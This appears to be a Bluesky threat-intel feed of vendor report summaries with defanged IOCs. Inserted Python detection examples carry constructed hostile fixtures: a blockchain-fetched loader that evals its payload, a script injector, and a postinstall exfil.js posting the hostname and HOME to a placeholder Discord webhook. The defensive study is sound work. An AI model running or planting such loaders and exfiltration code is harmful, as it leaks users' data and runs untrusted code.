piggo
@pigondrugs.bsky.social
24 followers 6 following 590 posts
I shear alpacas and try to defend the internet from malware
~Socket~
ENISA's 2025 report finds AI is fundamentally reshaping the threat landscape, automating phishing and creating new supply chain risks.
-
IOCs: Lumma Stealer, WormGPT, Rafel RAT
-
#AI #ENISA #SupplyChain #ThreatIntel
ENISA 2025: AI Reshapes Cyber Attacks
socket.dev
~Sophos~
Threat actors exploit legacy vulnerabilities and stolen credentials where MFA is absent, fueling a volatile ransomware landscape.
-
IOCs: Qilin, Akira
-
#MFA #Ransomware #ThreatIntel
Threat Intel Report: Ransomware, Stolen Credentials & Legacy Vulns
news.sophos.com
~Zscaler~
Nation-state actor UNC5221 breached F5, exfiltrating BIG-IP source code and internal zero-day vulnerability documentation.
-
IOCs: BRICKSTORM, UNC5221
-
#F5 #ThreatIntel #UNC5221
F5 Discloses Major Security Breach
www.zscaler.com
~Socket~
Vite+ is a new commercial, Rust-based toolchain designed to consolidate the JavaScript development ecosystem.
-
IOCs: (None identified)
-
#JavaScript #ThreatIntel #Vite
Vite+ Unveils Unified JS Toolchain
socket.dev
~Cisa~
CISA has released 13 new advisories detailing vulnerabilities in various ICS products from Rockwell, Siemens, and others.
-
IOCs: (None identified)
-
#CISA #ICS #ThreatIntel
CISA Releases 13 ICS Advisories
www.cisa.gov
~Mandiant~
UNC5142 distributes infostealers (VIDAR, ATOMIC) from compromised WordPress sites using a blockchain technique to store malicious code.
-
IOCs: ratatui[.]today, browser-storage[.]com, 80.64.30[.]238
-
...
UNC5142 Uses EtherHiding to Distribute Malware
cloud.google.com
~Mandiant~
DPRK actor UNC5342 is using the EtherHiding technique to deliver JADESNOW & INVISIBLEFERRET malware via public blockchains.
-
...
DPRK Adopts EtherHiding Malware Delivery
cloud.google.com
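The two Mandiant items above describe EtherHiding: the second stage is stored in a smart contract and a compromised site's loader fetches it with a read-only eth_call against a public RPC gateway, so nothing is hosted on attacker infrastructure that can be taken down. The following is an added example, not code from Mandiant or from the campaigns described, showing the mechanics a responder has to deal with: a contract function that returns `string` yields an ABI-encoded blob (32-byte offset, 32-byte length, padded data), which the loader decodes and executes. The decoder, the static triage rule and the watch-list of RPC hostnames are my own assumptions; the loader, RPC reply, contract address and calldata are constructed placeholders.

```python
import json
import re

# Hostname fragments of public read-only JSON-RPC gateways an in-browser loader
# might query. Constructed watch-list for this example, not a Mandiant list.
RPC_HOST_RE = re.compile(
    r'https?://[^\s"\'<>]*(?:binance\.org|bnbchain\.org|infura\.io|alchemy\.com|ankr\.com)[^\s"\'<>]*',
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.appendChild\s*\(|document\.write\s*\(")


def abi_encode_string(s: str) -> bytes:
    """ABI-encode a single dynamic `string` return value: offset, length, data padded to 32 bytes."""
    data = s.encode("utf-8")
    pad = (32 - len(data) % 32) % 32
    return (32).to_bytes(32, "big") + len(data).to_bytes(32, "big") + data + b"\x00" * pad


def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` of an eth_call reply whose contract function returns `string`."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("too short for an ABI-encoded dynamic string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points outside the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds the payload")
    return raw[start:start + length].decode("utf-8", errors="replace")


def decode_rpc_reply(body: str) -> str:
    """Pull the second-stage script out of a JSON-RPC eth_call reply body."""
    reply = json.loads(body)
    if "error" in reply:
        raise ValueError(f"RPC error: {reply['error']}")
    return abi_decode_string(reply["result"])


def triage_loader(js_source: str) -> dict:
    """Static triage: read-only eth_call to a public RPC gateway plus execution of the reply."""
    endpoints = sorted(set(RPC_HOST_RE.findall(js_source)))
    uses_eth_call = "eth_call" in js_source
    executes = bool(EXEC_RE.search(js_source))
    return {
        "rpc_endpoints": endpoints,
        "eth_call": uses_eth_call,
        "executes_result": executes,
        "verdict": bool(endpoints) and uses_eth_call and executes,
    }


# Constructed sample data: a throwaway second stage and a loader that would fetch it.
# The contract address and calldata are zero placeholders, not real indicators.
STAGE2 = "var s=document.createElement('script');s.src='https://example.invalid/next.js';document.body.appendChild(s);"
CONSTRUCTED_RPC_REPLY = json.dumps(
    {"jsonrpc": "2.0", "id": 1, "result": "0x" + abi_encode_string(STAGE2).hex()}
)
CONSTRUCTED_LOADER = """
const rpc = "https://bsc-dataseed.binance.org/";
const req = {jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{to: "0x0000000000000000000000000000000000000000", data: "0x00000000"}, "latest"]};
fetch(rpc, {method: "POST", body: JSON.stringify(req)})
  .then(r => r.json()).then(j => eval(decodeAbiString(j.result)));
"""

if __name__ == "__main__":
    print(triage_loader(CONSTRUCTED_LOADER))
    print(decode_rpc_reply(CONSTRUCTED_RPC_REPLY))
```

The practical consequence for defenders: blocking the contract does nothing, because the chain is public and read-only calls are free, so detection has to key on the loader (script injected into the compromised site) and on outbound eth_call traffic from hosts that have no business talking to blockchain RPC gateways.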
~Cofense~
Phishing campaign distributes a malicious 'Mac Spoofer' Chrome extension to steal user credentials from login forms.
-
IOCs: hibarriotech[.]com, reader[.]hibarriotech[.]com, 194.146.41[.]102
-
#Malware #Phishing #ThreatIntel
Malicious 'Mac Spoofer' Browser Extension
cofense.com
~Checkpoint~
A vulnerability in a new Rust-based Windows kernel component (win32kbase_rs.sys) allows local users to cause a system crash (BSOD) via a malformed metafile.
-
IOCs: (None identified)
-
#DoS #Rust #ThreatIntel #Windows
Rust Vulnerability in Windows GDI Kernel
research.checkpoint.com
~Trendmicro~
A doxxing campaign against alleged Lumma Stealer (Water Kurita) operators has caused a sharp decline in activity, with customers migrating to alternatives like Vidar and StealC.
-
IOCs: (None identified)
-
...
Lumma Stealer Doxxing Leads to Decline
www.trendmicro.com
~Zscaler~
Threat actors are increasingly exploiting non-web protocols like DNS, RDP, and SMB for covert C2, data theft, and ransomware attacks.
-
IOCs: (None identified)
-
#DNS #RDP #ThreatIntel
Attacks on Non-Web Protocols Increasing
www.zscaler.com
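DNS is the protocol in the Zscaler item above that is hardest to simply block, since every host needs it; the usual tell for DNS-based C2 or exfiltration is a single registrable domain receiving many unique, long, high-entropy subdomain labels, often as TXT or NULL queries. The following is an added example, not Zscaler's code, that scores a batch of resolver log lines on those heuristics. The log format, thresholds, the naive last-two-labels domain split and the sample queries are all my own constructions.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; hex or base32 chunks score far higher than words."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname: str) -> str:
    """Naive last-two-labels split; production code should use the public suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def score_queries(log_lines, min_unique=10, min_entropy=3.0, min_label_len=30):
    """Aggregate per registrable domain. Constructed line format: '<ts> <client> <qtype> <qname>'."""
    per_domain = defaultdict(lambda: {"subs": set(), "long": 0, "entropy": 0, "txt_null": 0})
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the batch
        _, _, qtype, qname = parts
        qname = qname.rstrip(".")
        base = registrable_domain(qname)
        sub = qname[: -len(base) - 1] if qname != base else ""
        st = per_domain[base]
        if sub:
            st["subs"].add(sub)
            first = sub.split(".")[0]  # the leftmost label carries the encoded data
            if len(first) >= min_label_len:
                st["long"] += 1
            if shannon_entropy(first) >= min_entropy:
                st["entropy"] += 1
        if qtype in ("TXT", "NULL"):
            st["txt_null"] += 1
    verdicts = {}
    half = max(1, min_unique // 2)
    for base, st in per_domain.items():
        uniq = len(st["subs"])
        verdicts[base] = {
            "unique_subdomains": uniq,
            "long_labels": st["long"],
            "high_entropy_labels": st["entropy"],
            "txt_or_null": st["txt_null"],
            "suspicious": uniq >= min_unique and (st["long"] >= half or st["entropy"] >= half),
        }
    return verdicts


def build_constructed_log():
    """Constructed sample: 12 tunnel-style TXT lookups plus three ordinary A lookups."""
    lines = []
    for i in range(12):
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]
        lines.append(f"2025-10-17T10:00:{i:02d}Z 10.0.0.5 TXT {chunk}.t.tunnel-test.invalid")
    for host in ("www", "mail", "cdn"):
        lines.append(f"2025-10-17T10:01:00Z 10.0.0.7 A {host}.example.com")
    return lines


if __name__ == "__main__":
    for domain, verdict in score_queries(build_constructed_log()).items():
        print(domain, verdict)
```

Tune `min_unique` to the window you aggregate over; CDNs and some telemetry SDKs also generate many unique labels, so the label length and entropy conditions are what keep the false-positive rate down.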
~Sophos~
Microsoft released a record 170 patches, fixing 8 critical issues and 3 zero-days under active exploitation.
-
IOCs: CVE-2025-24990, CVE-2025-47827, CVE-2025-59230
-
#Microsoft #PatchTuesday #ThreatIntel
Microsoft's Record October Patch Tuesday
news.sophos.com
~Sophos~
A nation-state actor breached F5, exfiltrating source code and undisclosed vulnerability data.
-
IOCs: (None identified)
-
#Breach #F5 #ThreatIntel
F5 Network Compromised
news.sophos.com
~Cisa~
CISA added an actively exploited Adobe Experience Manager RCE vulnerability (CVE-2025-54253) to its KEV catalog.
-
IOCs: CVE-2025-54253
-
#Adobe #CVE202554253 #ThreatIntel
CISA Adds Adobe RCE to KEV Catalog
www.cisa.gov
~Trendmicro~
Attackers exploit Cisco SNMP vulnerability CVE-2025-20352 to deploy rootkits, enabling RCE and persistent access.
-
IOCs: CVE-2025-20352
-
#CVE202520352 #Cisco #ThreatIntel
Cisco SNMP Vuln Exploited for Rootkits
www.trendmicro.com
~Socket~
A credential management failure at RubyGems resulted in a former maintainer retaining AWS root access, sparking a major community dispute over the incident's handling.
-
IOCs: (None identified)
-
#CloudSecurity #RubyGems #ThreatIntel
RubyGems Credential Incident Sparks Community Backlash
socket.dev
~Paloalto~
PhantomVAI Loader uses phishing and steganography to deliver multiple infostealers like Katz Stealer, AsyncRAT, and XWorm.
-
IOCs: (None identified)
-
#Infostealer #Malware #PhantomVAI #ThreatIntel
PhantomVAI Loader Delivers Infostealers
unit42.paloaltonetworks.com
~Cisa~
CISA directs federal agencies to patch F5 devices against an imminent threat from a nation-state actor.
-
IOCs: (None identified)
-
#CISA #F5 #ThreatIntel #Vulnerability
CISA Emergency Directive for F5 Devices
www.cisa.gov
~Socket~
Threat actors are using Discord webhooks for C2 and data exfiltration in malicious packages on npm, PyPI, and RubyGems.
-
...
Malicious Packages Use Discord for C2
socket.dev
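The Socket item above is about malicious packages that post stolen data to a Discord webhook, which works as an exfiltration channel because the URL is a plain HTTPS POST to a well-reputed domain. The following is an added example, not Socket's scanner, showing the triage a reviewer can run on an unpacked package before installing it: find webhook URLs in plaintext and behind base64, and list the npm lifecycle scripts that would run them automatically. The regexes, the hook list and the sample package (with a placeholder webhook id and token) are my own constructions.

```python
import base64
import json
import re

WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)
# Long base64 runs: packages often hide the URL behind atob()/Buffer.from(..., 'base64').
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_webhooks(text: str) -> set:
    """Webhook URLs present literally or inside base64-encoded strings."""
    hits = set(WEBHOOK_RE.findall(text))
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", errors="ignore")
        except ValueError:  # binascii.Error is a ValueError: not real base64, move on
            continue
        hits.update(WEBHOOK_RE.findall(decoded))
    return hits


def install_hooks(package_json_text: str) -> dict:
    """Lifecycle scripts that run on `npm install` without any import of the package."""
    try:
        scripts = json.loads(package_json_text).get("scripts", {})
    except ValueError:
        return {}
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def scan_package(files: dict) -> dict:
    """files: relative path -> text. Flags a package that both has a webhook and an install hook."""
    report = {"webhooks": {}, "install_hooks": {}}
    for name, text in files.items():
        hits = find_webhooks(text)
        if hits:
            report["webhooks"][name] = sorted(hits)
        if name.endswith("package.json"):
            report["install_hooks"].update(install_hooks(text))
    report["flag"] = bool(report["webhooks"]) and bool(report["install_hooks"])
    return report


# Constructed sample package. The webhook id and token are placeholders, not a real endpoint.
_PLACEHOLDER_HOOK = "https://discord.com/api/webhooks/000000000000000000/placeholderTokenForThisExample"
CONSTRUCTED_FILES = {
    "package.json": json.dumps({"name": "example-pkg", "version": "1.0.0",
                                "scripts": {"postinstall": "node lib/exfil.js"}}),
    "index.js": "module.exports = () => 'hello';\n",
    "lib/exfil.js": (
        "const os=require('os');\n"
        f"const u=Buffer.from('{base64.b64encode(_PLACEHOLDER_HOOK.encode()).decode()}','base64').toString();\n"
        "fetch(u,{method:'POST',body:JSON.stringify({content:os.hostname()+' '+process.env.HOME})});\n"
    ),
    "README.md": "# example-pkg\n",
}

if __name__ == "__main__":
    print(json.dumps(scan_package(CONSTRUCTED_FILES), indent=2))
```

For PyPI and RubyGems the equivalent trigger points are `setup.py` / `setup.cfg` custom install commands and gemspec `extensions`, so the hook check needs a per-ecosystem variant; the webhook regex is the same for all three.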
~Zscaler~
An SEO poisoning campaign distributes a trojanized Ivanti VPN client to steal credentials for a C2 server.
-
IOCs: 4.239.95[.]1, netml[.]shop, shopping5[.]shop
-
#Ivanti #SEOpoisoning #ThreatIntel
SEO Poisoning Targets Ivanti VPN Users
www.zscaler.com
~Elastic~
Elastic details its nightMARE library for malware analysis, demonstrating C2 extraction from Lumma Stealer.
-
IOCs: mocadia[.]com, mastwin[.]in, ordinarniyvrach[.]ru
-
#Lumma #MalwareAnalysis #ThreatIntel
Elastic's nightMARE Malware Analysis Library
www.elastic.co
~Cisa~
CISA adds five actively exploited vulnerabilities affecting Microsoft Windows, Rapid7, IGEL OS, and SKYSEA to its KEV catalog.
-
IOCs: CVE-2025-6264, CVE-2025-24990, CVE-2025-59230
-
#CISA #KEV #PatchNow #ThreatIntel
CISA Adds 5 CVEs to KEV Catalog
www.cisa.gov
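The KEV catalog additions above (and the Adobe one further up the feed) only matter if they get cross-checked against what you actually run, and each entry carries a due date under BOD 22-01. The following is an added example, not CISA tooling, that indexes the public KEV JSON feed and joins it with an asset inventory, reporting which hits are already past their due date. The feed URL is CISA's real one; the sample feed text reuses CVE IDs from this page but its vendor, product and date fields are placeholders I constructed, not the real catalog entries, and the inventory is made up.

```python
import json
from datetime import date


def load_kev(feed_text: str) -> dict:
    """Index the KEV feed by CVE ID.

    Live feed: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
    """
    return {v["cveID"].upper(): v for v in json.loads(feed_text)["vulnerabilities"]}


def check_inventory(kev: dict, inventory, today: date) -> list:
    """inventory: iterable of (asset, cve_id). Returns KEV matches, overdue ones first."""
    findings = []
    for asset, cve in inventory:
        entry = kev.get(cve.upper())
        if not entry:
            continue  # not in the catalog: still a vuln, just not a KEV-mandated one
        due = date.fromisoformat(entry["dueDate"])
        findings.append({
            "asset": asset,
            "cve": cve.upper(),
            "product": f'{entry["vendorProject"]} {entry["product"]}',
            "due": entry["dueDate"],
            "overdue": due < today,
            "ransomware": entry.get("knownRansomwareCampaignUse", "Unknown"),
        })
    return sorted(findings, key=lambda f: (not f["overdue"], f["due"], f["asset"]))


# Constructed sample feed in the KEV schema. CVE IDs are the ones named on this page;
# vendor/product/date values are placeholders, not the real catalog entries.
CONSTRUCTED_KEV_FEED = json.dumps({
    "title": "constructed sample",
    "catalogVersion": "0000.00.00",
    "vulnerabilities": [
        {"cveID": "CVE-2025-24990", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2025-10-14", "dueDate": "2025-11-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-59230", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2025-10-14", "dueDate": "2025-11-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-6264", "vendorProject": "Rapid7", "product": "Velociraptor",
         "dateAdded": "2025-10-14", "dueDate": "2025-11-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-54253", "vendorProject": "Adobe", "product": "Experience Manager",
         "dateAdded": "2025-10-15", "dueDate": "2025-11-15", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory: (asset, CVE). CVE-2025-99999 is a placeholder that is not in the feed.
CONSTRUCTED_INVENTORY = [
    ("web-01", "CVE-2025-54253"),
    ("ws-042", "cve-2025-24990"),
    ("build-07", "CVE-2025-99999"),
]

if __name__ == "__main__":
    for f in check_inventory(load_kev(CONSTRUCTED_KEV_FEED), CONSTRUCTED_INVENTORY, date.today()):
        print(f)
```

Pull the live feed on a schedule and diff it against the previous run: the `dateAdded` field is what tells you which entries are new since your last check, and `knownRansomwareCampaignUse` is the field worth sorting on when triage capacity is limited.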
~Cisa~
CISA released an advisory for the Rockwell Automation 1715 EtherNet/IP Comms Module (ICSA-25-287-01).
-
IOCs: (None identified)
-
#ICS #RockwellAutomation #ThreatIntel
CISA ICS Advisory: Rockwell Automation
www.cisa.gov
~Cofense~
Phishing campaign uses Microsoft branding and fake browser-locking alerts to lure victims into fraudulent tech support calls.
-
IOCs: 107.180.26[.]155, 184.168.97[.]153, deprivy[.]stified[.]sbs
-
#Phishing #TechSupportScam #ThreatIntel
Microsoft Logo Used in Tech Support Scams
cofense.com
~Sekoia~
A new TLS-based backdoor, PolarEdge, is being deployed on QNAP, Asus, and Synology devices by exploiting CVE-2023-20118.
-
IOCs: CVE-2023-20118
-
#Backdoor #CVE202320118 #PolarEdge #ThreatIntel
PolarEdge Backdoor Analysis
blog.sekoia.io